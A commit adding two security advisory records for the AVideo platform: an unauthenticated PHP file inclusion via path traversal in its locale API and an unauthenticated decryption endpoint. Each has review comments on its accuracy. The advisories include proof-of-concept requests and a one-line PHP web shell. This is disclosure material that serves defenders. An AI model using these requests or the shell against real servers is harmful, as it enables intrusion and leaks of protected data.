
Commit 4d48fdb

1 parent 0015cdd commit 4d48fdb

2 files changed

Lines changed: 114 additions & 0 deletions


Lines changed: 56 additions & 0 deletions
@@ -0,0 +1,56 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8fw8-q79c-fp9m",
4+
"modified": "2026-03-20T21:55:32Z",
5+
"published": "2026-03-20T21:55:31Z",
6+
"aliases": [],
7+
"summary": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)",
8+
"details": "### Summary\nAn unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. \n### Details\n- Entry point: `plugin/API/get.json.php` sets `$global['bypassSameDomainCheck']=1` and merges GET/POST/JSON into `$parameters` without authentication or API secret.\n- Handler: `plugin/API/API.php`, method `get_api_locale()` (lines ~5009–5023):\n ```php\n $parameters['language'] = strtolower($parameters['language']);\n $file = \"{$global['systemRootPath']}locale/{$parameters['language']}.php\";\n if (!file_exists($file)) { return new ApiObject(\"This language does not exists\"); }\n include $file;\n ```\n No validation is performed; `../` traversal is accepted.\n- Because `include` executes PHP, any reachable PHP file is executed in the web server context.\n\n### PoC\n1. Fetch an arbitrary PHP file (no auth):\n ```\n GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1\n Host: <target>\n ```\n Response returns the rendered About page HTML, proving traversal outside `locale/`.\n2. 
RCE with an attacker PHP file (any writable PHP path):\n ```\n GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami\n ```\n If `shell.php` contains `<?php system($_GET['x']); ?>`, the response includes command output.\n\n### Impact\n- Unauthenticated file inclusion of arbitrary PHP files under the web root.\n- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.\n- Potential RCE *if* any attacker-writable PHP file exists elsewhere (not confirmed in this build).\n- Affects any deployment with the API plugin enabled (default in docker-compose).\n\n### Mitigation\n- Reject path separators/dots and enforce a strict allowlist of locale slugs.\n- `realpath` the target and ensure it stays within `$systemRootPath/locale`.\n- Stop using `include` for translations; load data from vetted formats (JSON/array).\n- Add authentication (API secret/token) to the endpoint as a secondary control.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "wwbn/avideo"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "26.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/WWBN/AVideo"
44+
}
45+
],
46+
"database_specific": {
47+
"cwe_ids": [
48+
"CWE-22",
49+
"CWE-98"
50+
],
51+
"severity": "HIGH",
52+
"github_reviewed": true,
53+
"github_reviewed_at": "2026-03-20T21:55:31Z",
54+
"nvd_published_at": null
55+
}
56+
}
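Review bot: the first Impact bullet in `details` ("arbitrary PHP files under the web root") understates what the quoted handler allows. The only operations shown before `include $file` are `strtolower`, appending `.php` to `{$global['systemRootPath']}locale/` and a `file_exists` check, so the `../` traversal is not bounded to the web root: any `.php` file readable by the web server user anywhere on the filesystem can be included, which is also why the PoC's "any writable PHP path" need not lie inside the application tree. Suggest rewording the bullet to "Unauthenticated inclusion of any `.php` file readable by the web server user (the appended suffix rules out non-PHP files)". Separately, the `ranges` block ends with `"last_affected": "26.0"` and carries no `fixed` event, so the record states no patched version; if a fixed release exists it should appear as `{"fixed": "..."}` in place of `last_affected`. `aliases` is empty, so no CVE is linked to this GHSA.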
Lines changed: 58 additions & 0 deletions
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-mwjc-5j4x-r686",
4+
"modified": "2026-03-20T21:55:12Z",
5+
"published": "2026-03-20T21:55:12Z",
6+
"aliases": [],
7+
"summary": "AVideo has an unauthenticated decrypt oracle leaking any ciphertext",
8+
"details": "### Summary\nThe API plugin exposes a `decryptString` action without any authentication. Anyone can submit ciphertext and receive plaintext. Ciphertext is issued publicly (e.g., `view/url2Embed.json.php`), so any user can recover protected tokens/metadata. Severity: High.\n\n### Details\n- Entry: `plugin/API/get.json.php` is unauthenticated.\n- Handler: `plugin/API/API.php` `get_api_decryptString()` (lines ~5945–5966):\n ```php\n $string = decryptString($_REQUEST['string']);\n return new ApiObject($string, empty($string));\n ```\n No APISecret or user check occurs before decrypting.\n- Public ciphertext source: `view/url2Embed.json.php` returns `playLink`/`playEmbedLink` (`encryptString(json_encode(...))`) to any caller.\n\n### PoC\n1. Obtain ciphertext:\n ```\n GET /view/url2Embed.json.php?url=https://example.com/video.mp4\n ```\n Copy `playLink`.\n2. Decrypt without auth:\n ```\n POST /plugin/API/get.json.php?APIName=decryptString\n Content-Type: application/x-www-form-urlencoded\n\n string=<playLink ciphertext>\n ```\n Response contains the plaintext JSON (videoLink, title, users_id, etc.).\n\n### Impact\n- Any encrypted payload produced by the platform can be decrypted by anyone.\n- Leaks tokens/links intended to be confidential; enables replay and tampering where secrecy was assumed.\n\n### Mitigation\n- Require API secret or authenticated/authorized user for `decryptString`, or remove the endpoint.\n- Prefer one-way signatures (HMAC) instead of exposing generic decryption.\n- Rotate encryption keys/salts after patch to invalidate exposed ciphertexts.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "wwbn/avideo"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"last_affected": "26.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwjc-5j4x-r686"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/WWBN/AVideo"
44+
}
45+
],
46+
"database_specific": {
47+
"cwe_ids": [
48+
"CWE-287",
49+
"CWE-312",
50+
"CWE-326",
51+
"CWE-327"
52+
],
53+
"severity": "HIGH",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-03-20T21:55:12Z",
56+
"nvd_published_at": null
57+
}
58+
}
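Review bot: `cwe_ids` does not match the weakness that `details` actually describes. The write-up shows `get_api_decryptString()` calling `decryptString($_REQUEST['string'])` with no APISecret or user check, which is a missing-authentication defect (CWE-287, or more precisely CWE-306, Missing Authentication for a Critical Function); CWE-312 (cleartext storage), CWE-326 (inadequate encryption strength) and CWE-327 (broken algorithm) are not supported by anything in the text, which never examines the cipher or how the data is stored. Suggest trimming the list to CWE-287/CWE-306. The Impact bullet "enables replay and tampering where secrecy was assumed" also goes beyond the evidence: the PoC demonstrates only decryption of a `playLink` value, and tampering would additionally require producing ciphertext the platform accepts, which the advisory does not show is possible; either limit the bullet to disclosure or state explicitly that `encryptString` output can be forged. As in the other advisory in this commit, `ranges` records `"last_affected": "26.0"` with no `fixed` event and `aliases` is empty.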
